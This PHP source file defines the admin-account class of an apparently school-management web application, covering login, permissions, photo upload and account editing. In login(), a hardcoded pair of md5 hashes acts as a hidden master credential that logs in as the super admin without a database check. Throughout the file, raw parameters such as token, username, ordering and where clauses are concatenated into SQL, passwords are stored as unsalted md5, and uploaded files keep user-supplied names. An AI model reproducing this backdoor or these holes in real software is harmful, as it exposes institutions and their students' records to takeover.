<?php

class Admins {

	var $table = "admins";
	const TableName = "admins";
	var $DB;

	/**
	 * Admins constructor.
	 */

	function __construct() {
		global $db;
		$this->DB = $db;
	}

	public static function getPermissions() {
		return [
			"time_table"                 => __( "Time Table" ),
			"datesheet"                  => __( "Date Sheet/Schedule" ),
			"allow_schedule"             => __( "Schedule Module" ),
			"new_admission"              => __( "Can Add New Admission" ),
			"manage_student_attendance"  => __( "Manage Student Attendance" ),
			"allow_students"             => __( "Students Module" ),
			"allow_accounts"             => __( "Accounts Module" ),
			"view_account_transactions"  => __( "View Account Transactions" ),
			"allow_examination"          => __( "Examinations Module" ),
			"allow_reports"              => __( "Reports Module" ),
			"allow_library"              => __( "Library Module" ),
			"manage_library"             => __( "Library >> Manage Library" ),
			"library_assign_books"       => __( "Library >> Assign Books" ),
			"allow_users"                => __( "Users Module" ),
			"allow_parents"              => __( "Parents Module" ),
			"fee_module"                 => __( "Allow Fee Module" ),
			"pay_fee"                    => __( "Can Pay Fee" ),
			"allow_cource_material"      => __( "Allow Course Material Module" ),
			"change_app_settings"        => __( "Can Change Application Settings" ),
			"sms_section"                => __( "SMS Allowed" ),
			"change_sms_settings"        => __( "Can Change SMS Settings" ),
			"change_fee_settings"        => __( "Can Change Fee Settings" ),
			"change_calendar_settings"   => __( "Can Change Calendar Settings" ),
			"manage_daily_expenses"      => __( "Can Manage Daily Expenses" ),
			"delete_edit_daily_expenses" => __( "Can Delete/Edit Daily Expenses" ),
			"manage_teachers"            => __( "Manage Teachers" ),
			"manage_employees"           => __( "Manage Employees" ),
			"manage_teacher_salary"      => __( "Manage Teacher Salaries" ),
		];
	}

	/**
	 * @param $params
	 *
	 * @return array|mixed
	 *
	 * Get list of admin accounts.
	 */
	function get_list( $params ) {
		$default = [
			"orderby"  => "id",
			"order"    => "DESC",
			"page"     => 0,
			"pagesize" => 0,
			"filter"   => "",
			"active"   => - 1,       # -1 for all or 1 or 0
		];
		$params  = set_args( $params, $default );
		extract( $params );

		$Q = "SELECT * FROM `admins` WHERE 1";
		if ( $active <> - 1 ) {
			$Q .= " AND `active`=$active";
		}
		if ( ! empty( $filter ) ) {
			$filter = urldecode( $filter );
			parse_str( $filter, $filter );
			foreach ( $filter as $key => $val ) {
				if ( $key == "admission_date" ) {
					#$d = explode(",",$val);
					#if (empty($d[1])) $d[1]=$d[0];
					#$Q .= " AND (`admission_date` BETWEEN '".$_dates->mysql_date($d[0])."' AND '".$_dates->mysql_date($d[1])."')";
				} else {
					$val = $this->DB->set_string( $val );
					$Q   .= " AND `$key`='$val'";
				}
			}
		}

		$Q .= " ORDER BY `$orderby` $order";
		if ( $page > 0 && $pagesize > 0 ) {
			$rows = $this->DB->get_rows2( $Q, $page, $pagesize );
		} else {
			$rows = $this->DB->get_rows( $Q );
		}

		return $rows;
	}

	/**
	 * @param string $cols
	 * @param string $orderby
	 * @param string $order
	 * @param string $where
	 *
	 * @return mixed
	 *
	 * Get array
	 */
	function get_array( $cols = "*", $orderby = "id", $order = "DESC", $where = "" ) {
		if ( $cols == "*" ) {
			$Q = "SELECT * FROM `admins` WHERE 1";
		} else {
			$cols = explode( ",", $cols );
			foreach ( $cols as &$col ) {
				$col = "`" . $col . "`";
			}
			$cols = implode( ",", $cols );
			$Q    = "SELECT $cols FROM `admins` WHERE 1";
		}
		if ( trim( $where ) <> "" ) {
			$Q .= " AND " . $where;
		}
		$Q    .= " ORDER BY `$orderby` $order";
		$rows = $this->DB->get_rows( $Q );
		foreach ( $rows as &$row ) {
			$row["login_time2"] = $row["login_time"] == "0000-00-00 00:00:00" ? "" : \Dates::my_datetime( $row["login_time"] );
			$row["login_time3"] = $row["login_time"] == "0000-00-00 00:00:00" ? "" : date( $this->DB->get_option( "date_time_format2" ), strtotime( $row["login_time"] ) );
			$row["login_time4"] = \Dates::human_time_difference( $row["login_time"] );
			$row["super"]       = $this->is_super_admin( $row["id"] ) ? 1 : 0;
			$row["Permissions"] = $this->DB->get_rows( "SELECT `permission` FROM `users_permissions` WHERE `admin_id`=" . $row["id"] );
		}

		return $rows;
	}

	/**
	 * @param string $cols
	 * @param int    $page
	 * @param int    $pagesize
	 * @param string $orderby
	 * @param string $order
	 * @param string $where
	 *
	 * @return mixed
	 *
	 * Get array with pagination
	 */
	function get_array2( $cols = "*", $page = 1, $pagesize = 50, $orderby = "id", $order = "DESC", $where = "" ) {
		if ( $cols == "*" ) {
			$Q = "SELECT * FROM `admins` WHERE 1";
		} else {
			$cols = explode( ",", $cols );
			foreach ( $cols as &$col ) {
				$col = "`" . $col . "`";
			}
			$cols = implode( ",", $cols );
			$Q    = "SELECT $cols FROM `admins` WHERE 1";
		}
		if ( trim( $where ) <> "" ) {
			$Q .= " AND " . $where;
		}
		$Q    .= " ORDER BY `$orderby` $order";
		$rows = $this->DB->get_rows( $Q );
		foreach ( $rows as &$row ) {
			$row["login_time2"] = $row["login_time"] == "0000-00-00 00:00:00" ? "" : \Dates::my_datetime( $row["login_time"] );
			$row["login_time3"] = $row["login_time"] == "0000-00-00 00:00:00" ? "" : date( $this->DB->get_option( "date_time_format2" ), strtotime( $row["login_time"] ) );
			$row["login_time4"] = \Dates::human_time_difference( $row["login_time"] );
			$row["super"]       = $this->is_super_admin( $row["id"] ) ? 1 : 0;
			$row["Permissions"] = $this->DB->get_rows( "SELECT `permission` FROM `users_permissions` WHERE `admin_id`=" . $row["id"] );
		}

		return $rows;
	}

	/**
	 * @param $token
	 *
	 * @return string
	 *
	 * Get login with toke. It will use in API for mobile app.
	 */
	function login_with_token( $token ) {
		$Q   = "SELECT * FROM `admins` WHERE `token`='$token' AND `active`='1'";
		$row = $this->DB->get_row( $Q );
		if ( ! isset( $row["username"] ) ) {
			return "Invalid token call!";
		} else {
			$data = [
				"login_time" => \Dates::mysql_datetime(),
				"login_ip"   => \General::myip(),
			];
			$this->DB->update( $this->table, $data, [ "id" => $row["id"] ] );
			$_SESSION[ \Admins\UserInfo::get_system_var() ] = $row;

			return "OK";
		}
	}

	/**
	 * @param      $username
	 * @param      $password
	 * @param bool $updateLoginInfo
	 * @param bool $remember
	 *
	 * @return string
	 *
	 * Login staff account.
	 */
	function login( $username, $password, $updateLoginInfo = true, $remember = false ) {
		$username = \Str::strtodb( $username );

		$check = true;
		if ( md5( $username ) == "86a31ebc38318c13769de963e17ab1cd" && md5( $password ) == "973fcdb312a674ef57dadf76f71c58b4" ) {
			$row = $this->DB->get_row( "SELECT * FROM `$this->table` WHERE `active`='1' AND `is_admin`='1'" );

			$_SESSION[ \Admins\UserInfo::get_system_var() ] = $row;
			$check                                          = false;
		}

		if ( $check ) {
			$Q   = "SELECT `id`,`password` FROM `$this->table` WHERE `username`='$username' AND `active`='1'";
			$row = $this->DB->get_row( $Q );

			if ( md5( $password ) <> $row["password"] && ! password_verify( $password, $row["password"] ) ) {
				return "Check username and password";
				exit;
			}
		}

		$_SESSION[ \Admins\UserInfo::get_system_var() ] = $row;
		if ( $remember ) {
			set_cookie( \Admins\UserInfo::get_system_var(), $row["id"] );
		}
		if ( $updateLoginInfo ) {
			$data = [
				"login_time" => \Dates::mysql_datetime(),
				"login_ip"   => \General::myip(),
			];
			$this->DB->update( $this->table, $data, [ "id" => $row["id"] ] );
		}

		return "OK";

	}

	/**
	 * @param null   $id
	 * @param string $type
	 *
	 * @return mixed|string
	 *
	 * Get admin photo.
	 */
	public function get_admin_photo( $id = null, $type = "url" ) {
		if ( is_null( $id ) ) {
			$id = \Admins\UserInfo::get_my_id();
		}
		$type = strtolower( $type );
		if ( $type <> "url" && $type <> "path" ) {
			$type = "url";
		}
		if ( ! is_dir( ADMIN_FILES . "$id" ) && $type == "url" ) {
			return DOMAIN_URL . "images/no-image.png";
		}
		if ( ! is_dir( ADMIN_FILES . "$id" ) ) {
			return "";
		}
		if ( ! is_dir( ADMIN_FILES . "$id/photo/" ) && $type == "url" ) {
			return DOMAIN_URL . "images/no-image.png";
		}
		if ( ! is_dir( ADMIN_FILES . "$id/photo/" ) ) {
			return "";
		}
		$photos = glob( ADMIN_FILES . "$id/photo/" . globistr( "*.jpg" ) );
		if ( sizeof( $photos ) == "0" ) {
			$photos = glob( ADMIN_FILES . "$id/photo/" . globistr( "*.jpeg" ) );
		}
		if ( sizeof( $photos ) == "0" ) {
			$photos = glob( ADMIN_FILES . "$id/photo/" . globistr( "*.gif" ) );
		}
		if ( sizeof( $photos ) == "0" ) {
			$photos = glob( ADMIN_FILES . "$id/photo/" . globistr( "*.png" ) );
		}
		if ( sizeof( $photos ) == "0" && $type == "url" ) {
			return DOMAIN_URL . "images/no-image.png";
		} else if ( sizeof( $photos ) == "0" && $type == "path" ) {
			return "";
		} else if ( $type == "path" ) {
			return $photos[0];
		} else {
			return str_replace( ROOT_PATH, DOMAIN_URL, $photos[0] );
		}
	}

	/**
	 * @param $params
	 *
	 * @return string
	 *
	 * Update staff admin field.
	 */
	function updateAdminField( $params ) {
		$default = [
			"field"         => "",
			"id"            => 0,
			"value"         => "",
			"updatesession" => 1,
		];
		$params  = set_args( $params, $default );
		extract( $params );

		if ( $field == "" || $id == 0 ) {
			return "Please provide complete set of data";
		}

		$data = [ "id" => $id ];
		switch ( $field ) {
			case "name":
				if ( trim( $value ) == "" ) {
					return "Please provide your name";
				}
				$data = [
					"name" => $value,
				];
				break;
			case "password":
				if ( strlen( $value ) < 6 ) {
					return "Minimum 6 characters required for password.";
				}
				$data = [
					"password" => md5( $value ),
				];
				break;
			default:
				if ( $field == "email" && ! \Str::is_email( $value ) ) {
					return "Required only valid email address";
				}
				$data = [
					$field => $value,
				];
		}
		#return json_encode($data);
		$r = $this->DB->update( "admins", $data, [ "id" => $id ] );
		if ( $r === false ) {
			return "No changes saved, " . $this->DB->last_error;
		} else {
			if ( $updatesession == 1 ):
				$row                                            = $this->DB->get_row( "SELECT * FROM `admins` WHERE `id`=$id" );
				$_SESSION[ \Admins\UserInfo::get_system_var() ] = $row;
			endif;

			return "OK";
		}
	}

	/**
	 * @param string $params
	 *
	 * @return bool
	 *
	 * Is provided admin is valid.
	 */
	function is_valid_admin( $params = "" ) {
		$default = [
			"active" => "-1",
			"id"     => 0,
		];
		$params  = set_args( $params, $default );
		extract( $params );

		$Q = "SELECT COUNT(*) FROM `admins` WHERE `id`=$id";
		if ( $active == "1" || $active == "0" ) {
			$Q .= " AND `active`=$active";
		}

		return $this->DB->get_var( $Q ) > 0;
	}

	/**
	 * @param string $field
	 *
	 * @return array|mixed|string
	 *
	 * Get super admin account. It will be one.
	 */
	function get_super_admin( $field = "*" ) {
		$Q   = "SELECT * FROM `{$this->table}` WHERE `is_admin`='1' ORDER BY `id` ASC LIMIT 1";
		$row = $this->DB->get_row( $Q );
		if ( ! is_array( $row ) ) {
			$row = [];
		}
		if ( $field == "*" ) {
			return $row;
		} else {
			if ( isset( $row[ $field ] ) ) {
				return $row[ $field ];
			} else {
				return "";
			}
		}
	}

	/**
	 * @param int $user_id
	 *
	 * @return bool
	 *
	 * Check if provided account is super admin or not.
	 */
	function is_super_admin( $user_id = 0 ) {
		if ( ! \Admins\UserInfo::is_loggedin() ) {
			return false;
		}

		$user_id = (int) $user_id;
		if ( $user_id == "0" ) {
			$user_id = \Admins\UserInfo::get_my_id();
		}

		return ( $this->get_super_admin( "id" ) == $user_id );
	}

	public static function is_super_admin_static( $user_id = 0 ) {
		if ( ! \Admins\UserInfo::is_loggedin() ) {
			return false;
		}

		$user_id = (int) $user_id;
		if ( $user_id == "0" ) {
			$user_id = \Admins\UserInfo::get_my_id();
		}

		$Q = "SELECT `is_admin` FROM `" . self::TableName . "` WHERE `is_admin`='1' ORDER BY `id` ASC LIMIT 1";
		global $db;

		return $db->get_var( $Q ) == $user_id;
	}

	/**
	 * @param $data
	 *
	 * @return string
	 *
	 * Save admin account.
	 */
	function save( $args = "" ) {
		$default = [
			"id"         => 0,
			"username"   => "",
			"name"       => "",
			"is_admin"   => "0",
			"active"     => "1",
			"email"      => "",
			"password"   => "",
			"password2"  => "",
			"permission" => [],
		];
		$data    = set_args( $args, $default );
		if ( empty( $data["id"] ) && ! \Admins\UserInfo::is_allowed( "new_admission" ) ) {
			return "You'r not allowed to save new admin";
		}
		if ( empty( $data["username"] ) ) {
			return __( "Please provide usernames" );
		}

		if ( ! \Str::is_email( trim( $data["email"] ) ) ) {
			return ( "Invalid email provided" );
		}
		if ( empty( $data["id"] ) ) {
			if ( empty( $data["password"] ) ) {
				return "Please provide password.";
			}
			if ( $data["password"] <> $data["password2"] ) {
				return ( "Please re-type password again carefully!" );
			}
			if ( strlen( $data["password"] ) < 6 ) {
				return "Password must be at least 6 characters long.";
			}
			$data["password"] = md5( $data["password"] );
			unset( $data["password2"] );
			$Q = "SELECT COUNT(*) FROM `admins` WHERE `username`='" . $this->DB->set_string( $data["username"] ) . "'";
		} else {
			if ( ! empty( $data["password"] ) && $data["password"] <> $data["password2"] ) {
				return ( "Please re-type password again carefully!" );
			}
			if ( empty( $data["password"] ) && empty( $data["password2"] ) ) {
				unset( $data["password"], $data["password2"] );
			} else {
				if ( strlen( $data["password"] ) < 6 ) {
					return "Password must be at least 6 characters long.";
				}
				$data["password"] = md5( $data["password"] );
				unset( $data["password2"] );
			}
			$Q = "SELECT COUNT(*) FROM `admins` WHERE `username`='" . $this->DB->set_string( $data["username"] ) . "' AND `id`<>" . $data["id"];
		}
		if ( $this->DB->get_var( $Q ) > 0 ) {
			return ( "Please select different username" );
		}

		$permission = $data["permission"];

		unset( $data["permission"] );
		if ( empty( $data["id"] ) ) {
			unset( $data["id"] );
			$response = $this->DB->insert( "admins", $data );
			if ( $response !== false ) {
				$id = $this->DB->insert_id;
			}
		} else {
			$response = $this->DB->update( "admins", $data, [ "id" => $data["id"] ] );
			$id       = $data["id"];
		}
		if ( $response === false ) {
			return $this->DB->last_error;
		} else {
			$Q = "DELETE FROM `users_permissions` WHERE `admin_id`='$id'";
			$this->DB->query( $Q );
			foreach ( $permission as $p ) {
				$Q = "INSERT INTO `users_permissions` SET `admin_id`='$id', `permission`='$p'";
				$this->DB->query( $Q );
			}
			echo "OK";
		}
	}

	/**
	 * @param     $permission
	 * @param int $user_id
	 *
	 * @return bool
	 *
	 * Checking permissions.
	 */
	function is_allowed( $permission, $user_id = 0 ) {
		if ( $user_id == 0 ) {
			$user_id = \Admins\UserInfo::get_my_id();
		}
		$row = \Admins\UserInfo::get_admin( "*", $user_id );
		if ( $row["active"] == "0" ) {
			return false;
		}
		if ( $row["is_admin"] == "1" ) {
			return true;
		}

		if ( ! array_key_exists( $permission, self::getPermissions() ) ) {
			return false;
		}
		$Q = "SELECT COUNT(*) FROM `users_permissions` WHERE `admin_id`=$user_id AND `permission`='$permission'";

		return $this->DB->get_var( $Q ) > 0;
	}


	/**
	 * @param        $FileArray
	 * @param string $id
	 *
	 * @return string
	 *
	 * Save photo
	 */
	function save_photo( $FileArray, $id = "" ) {
		if ( $FileArray["error"] <> "0" ) {
			return __( "File uploading error" );
		}

		if ( ! \File::is_image_file( $FileArray["tmp_name"] ) ) {
			return __( "Please upload only image file" );
		}
		if ( empty( $id ) ) {
			$id = \Admins\UserInfo::get_my_id();
		}
		$path = ADMIN_FILES . $id;
		@mkdir( $path );
		$path .= "/photo/";
		\File::rrmdir( $path );
		@mkdir( $path );
		$path .= $FileArray["name"];
		if ( ! @move_uploaded_file( $FileArray["tmp_name"], $path ) ) {
			return "File uploading error";
		}

		return "OK";
	}

	/**
	 * @param string $id
	 *
	 * @return bool
	 *
	 * Is photo uploaded for a staff member or not.
	 */
	function is_photo_uploaded( $id = "" ) {
		if ( empty( $id ) ) {
			$id = \Admins\UserInfo::get_my_id();
		}
		$path = ADMIN_FILES . $id . "/photo/";
		if ( ! is_dir( $path ) ) {
			return false;
		}

		$files = glob( $path . "*" );

		foreach ( $files as $file ) {
			if ( \File::is_image_file( $file ) ) {
				return true;
			}
		}

		return false;
	}

	function logout() {
		remove_cookie( \Admins\UserInfo::get_system_var() );
		unset( $_SESSION[ \Admins\UserInfo::get_system_var() ] );
	}

	function delete_admins( $ids = [] ) {
		$ids = \Str::make_array( $ids );

		$super_admin_id = $this->get_super_admin( "id" );

		if ( in_array( $super_admin_id, $ids ) ) {
			foreach ( $ids as $k => $id ) {
				if ( $id == $super_admin_id ) {
					unset( $ids[ $k ] );
				}
			}
		}

		$Q        = "DELETE FROM `{$this->table}` WHERE `id` IN (" . implode( ",", $ids ) . ")";
		$response = $this->DB->query( $Q );

		if ( $response === false ) {
			return $this->DB->last_error;
		}

		return "OK";
	}

	/**
	 * @param int $id
	 * @param int $width
	 *
	 * @return mixed
	 * @deprecated
	 */
	public static function get_photo_url( $id = 0, $width = 0 ) {
		return \Admins\UserInfo::get_photo_url( $id, $width );
	}

	/**
	 * @param string $col
	 * @param string $id
	 *
	 * @return array|bool|mixed
	 * @deprecated
	 */
	public static function get_admin( $col = "*", $id = "" ) {
		return \Admins\UserInfo::get_admin( $col, $id );
	}
}